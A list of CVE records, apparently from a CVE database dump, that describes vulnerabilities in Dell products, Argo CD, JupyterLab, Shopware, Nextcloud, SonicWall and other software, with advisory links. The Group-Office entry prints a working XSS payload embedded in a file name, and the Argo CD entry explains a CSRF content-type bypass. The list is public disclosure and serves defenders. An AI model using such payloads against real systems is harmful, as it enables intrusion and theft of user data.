CVE 2024 22453 Candidate Dell PowerEdge Server BIOS contains a heap-based buffer overflow vulnerability. A local high privileged attacker could potentially exploit this vulnerability to write to otherwise unauthorized memory. MISC:https://www.dell.com/support/kbdoc/en-us/000223209/dsa-2024-105-security-update-for-dell-poweredge-server-bios-for-a-heap-based-buffer-overflow-vulnerability | URL:https://www.dell.com/support/kbdoc/en-us/000223209/dsa-2024-105-security-update-for-dell-poweredge-server-bios-for-a-heap-based-buffer-overflow-vulnerability Assigned (20240110)
CVE 2024 22452 Candidate Dell Display and Peripheral Manager for macOS prior to 1.3 contains an improper access control vulnerability. A low privilege user could potentially exploit this vulnerability by modifying files in the installation folder to execute arbitrary code, leading to privilege escalation. MISC:https://www.dell.com/support/kbdoc/en-us/000221414/dsa-2024-056 | URL:https://www.dell.com/support/kbdoc/en-us/000221414/dsa-2024-056 Assigned (20240110)
CVE 2024 2245 Candidate Cross-Site Scripting vulnerability in moziloCMS version 2.0. By sending a POST request to the '/install.php' endpoint, a JavaScript payload could be executed in the 'username' parameter. MISC:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-mozilocms | URL:https://www.incibe.es/en/incibe-cert/notices/aviso/cross-site-scripting-vulnerability-mozilocms Assigned (20240307)
CVE 2024 22449 Candidate Dell PowerScale OneFS versions 9.0.0.x through 9.6.0.x contains a missing authentication for critical function vulnerability. A low privileged local malicious user could potentially exploit this vulnerability to gain elevated access. MISC:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities Assigned (20240110)
CVE 2024 22445 Candidate Dell PowerProtect Data Manager, version 19.15 and prior versions, contain an OS command injection vulnerability. A remote high privileged attacker could potentially exploit this vulnerability, leading to the execution of arbitrary OS commands on the application's underlying OS, with the privileges of the vulnerable application. Exploitation may lead to a system take over by an attacker. MISC:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222025/dsa-2024-061-dell-power-protect-data-manager-update-for-multiple-security-vulnerabilities Assigned (20240110)
CVE 2024 22433 Candidate Dell Data Protection Search 19.2.0 and above contain an exposed password opportunity in plain text when using LdapSettings.get_ldap_info in DP Search. A remote unauthorized unauthenticated attacker could potentially exploit this vulnerability leading to a loss of Confidentiality, Integrity, Protection, and remote takeover of the system. This is a high-severity vulnerability as it allows an attacker to take complete control of DP Search to affect downstream protected devices. MISC:https://www.dell.com/support/kbdoc/en-us/000221720/dsa-2024-063-security-update-for-dell-data-protection-search-multiple-security-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000221720/dsa-2024-063-security-update-for-dell-data-protection-search-multiple-security-vulnerabilities Assigned (20240110)
CVE 2024 22432 Candidate Networker 19.9 and all prior versions contains a Plain-text Password stored in temporary config file during backup duration in NMDA MySQL Database backups. User has low privilege access to Networker Client system could potentially exploit this vulnerability, leading to the disclosure of configured MySQL Database user credentials. The attacker may be able to use the exposed credentials to access the vulnerable application Database with privileges of the compromised account. MISC:https://www.dell.com/support/kbdoc/en-us/000221474/dsa-2024-059-security-update-for-dell-networker-multiple-components-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000221474/dsa-2024-059-security-update-for-dell-networker-multiple-components-vulnerabilities Assigned (20240110)
CVE 2024 22430 Candidate Dell PowerScale OneFS versions 8.2.x through 9.6.0.x contains an incorrect default permissions vulnerability. A local low privileges malicious user could potentially exploit this vulnerability, leading to denial of service. MISC:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000221707/dsa-2024-028-security-update-for-dell-powerscale-onefs-for-multiple-security-vulnerabilities Assigned (20240110)
CVE 2024 22428 Candidate Dell iDRAC Service Module, versions 5.2.0.0 and prior, contain an Incorrect Default Permissions vulnerability. It may allow a local unprivileged user to escalate privileges and execute arbitrary code on the affected system. Dell recommends customers upgrade at the earliest opportunity. MISC:https://www.dell.com/support/kbdoc/en-us/000221129/dsa-2024-018-security-update-for-dell-idrac-service-module-for-weak-folder-permission-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000221129/dsa-2024-018-security-update-for-dell-idrac-service-module-for-weak-folder-permission-vulnerabilities Assigned (20240110)
CVE 2024 22426 Candidate Dell RecoverPoint for Virtual Machines 5.3.x contains an OS Command injection vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to execute arbitrary operating system commands, which will get executed in the context of the root user, resulting in a complete system compromise. MISC:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities Assigned (20240110)
CVE 2024 22425 Candidate Dell RecoverPoint for Virtual Machines 5.3.x contains a brute force/dictionary attack vulnerability. An unauthenticated remote attacker could potentially exploit this vulnerability, leading to launch a brute force attack or a dictionary attack against the RecoverPoint login form. This allows attackers to brute-force the password of valid users in an automated manner. MISC:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities | URL:https://www.dell.com/support/kbdoc/en-us/000222133/dsa-2024-092-security-update-for-dell-recoverpoint-for-virtual-machines-multiple-vulnerabilities Assigned (20240110)
CVE 2024 22424 Candidate Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/argoproj/argo-cd/issues/2496 | URL:https://github.com/argoproj/argo-cd/issues/2496 | MISC:https://github.com/argoproj/argo-cd/pull/16860 | URL:https://github.com/argoproj/argo-cd/pull/16860 | MISC:https://github.com/argoproj/argo-cd/security/advisories/GHSA-92mw-q256-5vwg | URL:https://github.com/argoproj/argo-cd/security/advisories/GHSA-92mw-q256-5vwg Assigned (20240110)
CVE 2024 22422 Candidate AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow attacker to crash the server resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2 | URL:https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2 | MISC:https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q | URL:https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q Assigned (20240110)
CVE 2024 22421 Candidate JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix. FEDORA:FEDORA-2024-1673c2696e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/ | MISC:https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6 | URL:https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6 | MISC:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947 | URL:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947 Assigned (20240110)
CVE 2024 22420 Candidate JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension. FEDORA:FEDORA-2024-1673c2696e | URL:https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UQJKNRDRFMKGVRIYNNN6CKMNJDNYWO2H/ | MISC:https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df | URL:https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df | MISC:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4 | URL:https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4 Assigned (20240110)
CVE 2024 2242 Candidate The Contact Form 7 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘active-tab’ parameter in all versions up to, and including, 5.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. MISC:https://plugins.trac.wordpress.org/changeset/3049594/contact-form-7/trunk/admin/edit-contact-form.php | URL:https://plugins.trac.wordpress.org/changeset/3049594/contact-form-7/trunk/admin/edit-contact-form.php | MISC:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve | URL:https://www.wordfence.com/threat-intel/vulnerabilities/id/d5bf4972-424a-4470-a0bc-7dcc95378e0e?source=cve Assigned (20240306)
CVE 2024 22419 Candidate Vyper is a Pythonic Smart Contract Language for the Ethereum Virtual Machine. The `concat` built-in can write over the bounds of the memory buffer that was allocated for it and thus overwrite existing valid data. The root cause is that the `build_IR` for `concat` doesn't properly adhere to the API of copy functions (for `>=0.3.2` the `copy_bytes` function). A contract search was performed and no vulnerable contracts were found in production. The buffer overflow can result in the change of semantics of the contract. The overflow is length-dependent and thus it might go unnoticed during contract testing. However, certainly not all usages of concat will result in overwritten valid data as we require it to be in an internal function and close to the return statement where other memory allocations don't occur. This issue has been addressed in commit `55e18f6d1` which will be included in future releases. Users are advised to update when possible. MISC:https://github.com/vyperlang/vyper/commit/55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f | URL:https://github.com/vyperlang/vyper/commit/55e18f6d128b2da8986adbbcccf1cd59a4b9ad6f | MISC:https://github.com/vyperlang/vyper/issues/3737 | URL:https://github.com/vyperlang/vyper/issues/3737 | MISC:https://github.com/vyperlang/vyper/security/advisories/GHSA-2q8v-3gqq-4f8p | URL:https://github.com/vyperlang/vyper/security/advisories/GHSA-2q8v-3gqq-4f8p Assigned (20240110)
CVE 2024 22418 Candidate Group-Office is an enterprise CRM and groupware tool. Affected versions are subject to a vulnerability which is present in the file upload mechanism of Group Office. It allows an attacker to execute arbitrary JavaScript code by embedding it within a file's name. For instance, using a filename such as “><img src=x onerror=prompt('XSS')>.jpg” triggers the vulnerability. When this file is uploaded, the JavaScript code within the filename is executed. This issue has been addressed in version 6.8.29. All users are advised to upgrade. There are no known workarounds for this vulnerability. MISC:https://github.com/Intermesh/groupoffice/commit/2a52a5d42d080db6738d70eba30294bcd94ebd09 | URL:https://github.com/Intermesh/groupoffice/commit/2a52a5d42d080db6738d70eba30294bcd94ebd09 | MISC:https://github.com/Intermesh/groupoffice/security/advisories/GHSA-p7w9-h6c3-wqpp | URL:https://github.com/Intermesh/groupoffice/security/advisories/GHSA-p7w9-h6c3-wqpp Assigned (20240110)
CVE 2024 22417 Candidate Whoogle Search is a self-hosted metasearch engine. In versions 0.8.3 and prior, the `element` method in `app/routes.py` does not validate the user-controlled `src_type` and `element_url` variables and passes them to the `send` method which sends a `GET` request on lines 339-343 in `requests.py`. The returned contents of the URL are then passed to and reflected back to the user in the `send_file` function on line 484, together with the user-controlled `src_type`, which allows the attacker to control the HTTP response content type leading to a cross-site scripting vulnerability. An attacker could craft a special URL to point to a malicious website and send the link to a victim. The fact that the link would contain a trusted domain (e.g. from one of public Whoogle instances) could be used to trick the user into clicking the link. The malicious website could, for example, be a copy of a real website, meant to steal a person’s credentials to the website, or trick that person in another way. Version 0.8.4 contains a patch for this issue. MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/request.py#L339-L343 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L465-L490 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L466 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L476 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L479 | MISC:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L484C6-L484C7 | URL:https://github.com/benbusby/whoogle-search/blob/92e8ede24e9277a5440d403f75877209f1269884/app/routes.py#L484C6-L484C7 | MISC:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | URL:https://github.com/benbusby/whoogle-search/commit/3a2e0b262e4a076a20416b45e6b6f23fd265aeda | MISC:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ | URL:https://securitylab.github.com/advisories/GHSL-2023-186_GHSL-2023-189_benbusby_whoogle-search/ Assigned (20240110)
CVE 2024 22416 Candidate pyLoad is a free and open-source Download Manager written in pure Python. The `pyload` API allows any API call to be made using GET requests. Since the session cookie is not set to `SameSite: strict`, this opens the library up to severe attack possibilities via a Cross-Site Request Forgery (CSRF) attack. As a result any API call can be made via a CSRF attack by an unauthenticated user. This issue has been addressed in release `0.5.0b3.dev78`. All users are advised to upgrade. MISC:https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e | URL:https://github.com/pyload/pyload/commit/1374c824271cb7e927740664d06d2e577624ca3e | MISC:https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc | URL:https://github.com/pyload/pyload/commit/c7cdc18ad9134a75222974b39e8b427c4af845fc | MISC:https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm | URL:https://github.com/pyload/pyload/security/advisories/GHSA-pgpj-v85q-h5fm Assigned (20240110)
CVE 2024 22415 Candidate jupyter-lsp is a coding assistance tool for JupyterLab (code navigation + hover suggestions + linters + autocompletion + rename) using Language Server Protocol. Installations of jupyter-lsp running in environments without configured file system access control (on the operating system level), and with jupyter-server instances exposed to non-trusted network are vulnerable to unauthorised access and modification of file system beyond the jupyter root directory. This issue has been patched in version 2.2.2 and all users are advised to upgrade. Users unable to upgrade should uninstall jupyter-lsp. MISC:https://github.com/jupyter-lsp/jupyterlab-lsp/commit/4ad12f204ad0b85580fc32137c647baaff044e95 | URL:https://github.com/jupyter-lsp/jupyterlab-lsp/commit/4ad12f204ad0b85580fc32137c647baaff044e95 | MISC:https://github.com/jupyter-lsp/jupyterlab-lsp/security/advisories/GHSA-4qhp-652w-c22x | URL:https://github.com/jupyter-lsp/jupyterlab-lsp/security/advisories/GHSA-4qhp-652w-c22x Assigned (20240110)
CVE 2024 22414 Candidate flaskBlog is a simple blog app built with Flask. Improper storage and rendering of the `/user/<user>` page allows a user's comments to execute arbitrary javascript code. The html template `user.html` contains the following code snippet to render comments made by a user: `<div class="content" tag="content">{{comment[2]|safe}}</div>`. Use of the "safe" tag causes flask to _not_ escape the rendered content. To remediate this, simply remove the `|safe` tag from the HTML above. No fix is is available and users are advised to manually edit their installation. MISC:https://github.com/DogukanUrker/flaskBlog/security/advisories/GHSA-mrcw-j96f-p6v6 | URL:https://github.com/DogukanUrker/flaskBlog/security/advisories/GHSA-mrcw-j96f-p6v6 Assigned (20240110)
CVE 2024 22412 Candidate ClickHouse is an open-source column-oriented database management system. A bug exists in the cloud ClickHouse offering prior to version 24.0.2.54535 and in github.com/clickhouse/clickhouse version 23.1. Query caching bypasses the role based access controls and the policies being enforced on roles. In affected versions, the query cache only respects separate users, however this is not documented and not expected behavior. People relying on ClickHouse roles can have their access control lists bypassed if they are using query caching. Attackers who have control of a role could guess queries and see data they shouldn't have access to. Version 24.1 of ClickHouse and version 24.0.2.54535 of ClickHouse Cloud contain a patch for this issue. Based on the documentation, role based access control should be enforced regardless if query caching is enabled or not. MISC:https://github.com/ClickHouse/ClickHouse/blob/bd17ee769e337906c4b1f404861e042ad72fcbfc/src/Interpreters/executeQuery.cpp#L1013-L1015 | URL:https://github.com/ClickHouse/ClickHouse/blob/bd17ee769e337906c4b1f404861e042ad72fcbfc/src/Interpreters/executeQuery.cpp#L1013-L1015 | MISC:https://github.com/ClickHouse/ClickHouse/pull/58611 | URL:https://github.com/ClickHouse/ClickHouse/pull/58611 | MISC:https://github.com/ClickHouse/ClickHouse/security/advisories/GHSA-45h5-f7g3-gr8r | URL:https://github.com/ClickHouse/ClickHouse/security/advisories/GHSA-45h5-f7g3-gr8r Assigned (20240110)
CVE 2024 22411 Candidate Avo is a framework to create admin panels for Ruby on Rails apps. In Avo 3 pre12, any HTML inside text that is passed to `error` or `succeed` in an `Avo::BaseAction` subclass will be rendered directly without sanitization in the toast/notification that appears in the UI on Action completion. A malicious user could exploit this vulnerability to trigger a cross site scripting attack on an unsuspecting user. This issue has been addressed in the 3.3.0 and 2.47.0 releases of Avo. Users are advised to upgrade. MISC:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347 | URL:https://github.com/avo-hq/avo/commit/51bb80b181cd8e31744bdc4e7f9b501c81172347 | MISC:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258 | URL:https://github.com/avo-hq/avo/commit/fc92a05a8556b1787c8694643286a1afa6a71258 | MISC:https://github.com/avo-hq/avo/releases/tag/v2.47.0 | URL:https://github.com/avo-hq/avo/releases/tag/v2.47.0 | MISC:https://github.com/avo-hq/avo/releases/tag/v3.3.0 | URL:https://github.com/avo-hq/avo/releases/tag/v3.3.0 | MISC:https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh | URL:https://github.com/avo-hq/avo/security/advisories/GHSA-g8vp-2v5p-9qfh Assigned (20240110)
CVE 2024 22410 Candidate Creditcoin is a network that enables cross-blockchain credit transactions. The Windows binary of the Creditcoin node loads a suite of DLLs provided by Microsoft at startup. If a malicious user has access to overwrite the program files directory it is possible to replace these DLLs and execute arbitrary code. It is the view of the blockchain development team that the threat posed by a hypothetical binary planting attack is minimal and represents a low-security risk. The vulnerable DLL files are from the Windows networking subsystem, the Visual C++ runtime, and low-level cryptographic primitives. Collectively these dependencies are required for a large ecosystem of applications, ranging from enterprise-level security applications to game engines, and don’t represent a fundamental lack of security or oversight in the design and implementation of Creditcoin. The blockchain team takes the stance that running Creditcoin on Windows is officially unsupported and at best should be thought of as experimental. MISC:https://github.com/gluwa/creditcoin/security/advisories/GHSA-cx5c-xwcv-vhmq | URL:https://github.com/gluwa/creditcoin/security/advisories/GHSA-cx5c-xwcv-vhmq | MISC:https://owasp.org/www-community/attacks/Binary_planting | URL:https://owasp.org/www-community/attacks/Binary_planting Assigned (20240110)
CVE 2024 2241 Candidate Improper access control in the user interface in Devolutions Workspace 2024.1.0 and earlier allows an authenticated user to perform unintended actions via specific permissions MISC:https://devolutions.net/security/advisories/DEVO-2024-0003 | URL:https://devolutions.net/security/advisories/DEVO-2024-0003 Assigned (20240306)
CVE 2024 22409 Candidate DataHub is an open-source metadata platform. In affected versions a low privileged user could remove a user, edit group members, or edit another user's profile information. The default privileges gave too many broad permissions to low privileged users. These have been constrained in PR #9067 to prevent abuse. This issue can result in privilege escalation for lower privileged users up to admin privileges, potentially, if a group with admin privileges exists. May not impact instances that have modified default privileges. This issue has been addressed in datahub version 0.12.1. Users are advised to upgrade. MISC:https://github.com/datahub-project/datahub/pull/9067 | URL:https://github.com/datahub-project/datahub/pull/9067 | MISC:https://github.com/datahub-project/datahub/security/advisories/GHSA-x3v6-r479-m4xv | URL:https://github.com/datahub-project/datahub/security/advisories/GHSA-x3v6-r479-m4xv Assigned (20240110)
CVE 2024 22408 Candidate Shopware is an open headless commerce platform. The implemented Flow Builder functionality in the Shopware application does not adequately validate the URL used when creating the “call webhook” action. This enables malicious users to perform web requests to internal hosts. This issue has been fixed in the Commercial Plugin release 6.5.7.4 or with the Security Plugin. For installations with Shopware 6.4 the Security plugin is recommended to be installed and up to date. For older versions of 6.4 and 6.5 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. MISC:https://github.com/shopware/shopware/security/advisories/GHSA-3535-m8vh-vrmw | URL:https://github.com/shopware/shopware/security/advisories/GHSA-3535-m8vh-vrmw Assigned (20240110)
CVE 2024 22407 Candidate Shopware is an open headless commerce platform. In the Shopware CMS, the state handler for orders fails to sufficiently verify user authorizations for actions that modify the payment, delivery, and/or order status. Due to this inadequate implementation, users lacking 'write' permissions for orders are still able to change the order state. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. MISC:https://github.com/shopware/shopware/security/advisories/GHSA-3867-jc5c-66qf | URL:https://github.com/shopware/shopware/security/advisories/GHSA-3867-jc5c-66qf Assigned (20240110)
CVE 2024 22406 Candidate Shopware is an open headless commerce platform. The Shopware application API contains a search functionality which enables users to search through information stored within their Shopware instance. The searches performed by this function can be aggregated using the parameters in the “aggregations” object. The ‘name’ field in this “aggregations” object is vulnerable SQL-injection and can be exploited using time-based SQL-queries. This issue has been addressed and users are advised to update to Shopware 6.5.7.4. For older versions of 6.1, 6.2, 6.3 and 6.4 corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. MISC:https://github.com/shopware/shopware/security/advisories/GHSA-qmp9-2xwj-m6m9 | URL:https://github.com/shopware/shopware/security/advisories/GHSA-qmp9-2xwj-m6m9 Assigned (20240110)
CVE 2024 22404 Candidate Nextcloud files Zip app is a tool to create zip archives from one or multiple files from within Nextcloud. In affected versions users can download "view-only" files by zipping the complete folder. It is recommended that the Files ZIP app is upgraded to 1.2.1, 1.4.1, or 1.5.0. Users unable to upgrade should disable the file zip app. MISC:https://github.com/nextcloud/files_zip/commit/43204539d517a13e945b90652718e2a213f46820 | URL:https://github.com/nextcloud/files_zip/commit/43204539d517a13e945b90652718e2a213f46820 | MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vhj3-mch4-67fq | URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-vhj3-mch4-67fq | MISC:https://hackerone.com/reports/2247457 | URL:https://hackerone.com/reports/2247457 Assigned (20240110)
CVE 2024 22403 Candidate Nextcloud server is a self hosted personal cloud system. In affected versions OAuth codes did not expire. When an attacker would get access to an authorization code they could authenticate at any time using the code. As of version 28.0.0 OAuth codes are invalidated after 10 minutes and will no longer be authenticated. To exploit this vulnerability an attacker would need to intercept an OAuth code from a user session. It is recommended that the Nextcloud Server is upgraded to 28.0.0. There are no known workarounds for this vulnerability. MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wppc-f5g8-vx36 | URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wppc-f5g8-vx36 | MISC:https://github.com/nextcloud/server/pull/40766 | URL:https://github.com/nextcloud/server/pull/40766 | MISC:https://hackerone.com/reports/1784162 | URL:https://hackerone.com/reports/1784162 Assigned (20240110)
CVE 2024 22402 Candidate Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users were able to load the first page of apps they were actually not allowed to access. Depending on the selection of apps installed this may present a permissions bypass. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability. MISC:https://github.com/nextcloud/guests/pull/1082 | URL:https://github.com/nextcloud/guests/pull/1082 | MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v3qw-7vgv-2fxj | URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-v3qw-7vgv-2fxj | MISC:https://hackerone.com/reports/2251074 | URL:https://hackerone.com/reports/2251074 Assigned (20240110)
CVE 2024 22401 Candidate Nextcloud guests app is a utility to create guest users which can only see files shared with them. In affected versions users could change the allowed list of apps, allowing them to use apps that were not intended to be used. It is recommended that the Guests app is upgraded to 2.4.1, 2.5.1 or 3.0.1. There are no known workarounds for this vulnerability. MISC:https://github.com/nextcloud/guests/pull/1082 | URL:https://github.com/nextcloud/guests/pull/1082 | MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wr87-hx3w-29hh | URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-wr87-hx3w-29hh | MISC:https://hackerone.com/reports/2250398 | URL:https://hackerone.com/reports/2250398 Assigned (20240110)
CVE 2024 22400 Candidate Nextcloud User Saml is an app for authenticating Nextcloud users using SAML. In affected versions users can be given a link to the Nextcloud server and end up on a uncontrolled thirdparty server. It is recommended that the User Saml app is upgraded to version 5.1.5, 5.2.5, or 6.0.1. There are no known workarounds for this issue. MISC:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-622q-xhfr-xmv7 | URL:https://github.com/nextcloud/security-advisories/security/advisories/GHSA-622q-xhfr-xmv7 | MISC:https://github.com/nextcloud/user_saml/commit/b184304a476deeba36e92b70562d5de7c2f85f8a | URL:https://github.com/nextcloud/user_saml/commit/b184304a476deeba36e92b70562d5de7c2f85f8a | MISC:https://github.com/nextcloud/user_saml/pull/788 | URL:https://github.com/nextcloud/user_saml/pull/788 | MISC:https://hackerone.com/reports/2263044 | URL:https://hackerone.com/reports/2263044 Assigned (20240110)
CVE 2024 22398 Candidate An improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in SonicWall Email Security Appliance could allow a remote attacker with administrative privileges to conduct a directory traversal attack and delete arbitrary files from the appliance file system. MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0006 | URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0006 Assigned (20240110)
CVE 2024 22397 Candidate Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in the SonicOS SSLVPN portal allows a remote authenticated attacker as a firewall 'admin' user to store and execute arbitrary JavaScript code. MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0005 | URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0005 Assigned (20240110)
CVE 2024 22396 Candidate An Integer-based buffer overflow vulnerability in the SonicOS via IPSec allows a remote attacker in specific conditions to cause Denial of Service (DoS) and potentially execute arbitrary code by sending a specially crafted IKEv2 payload. MISC:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0004 | URL:https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2024-0004 Assigned (20240110)
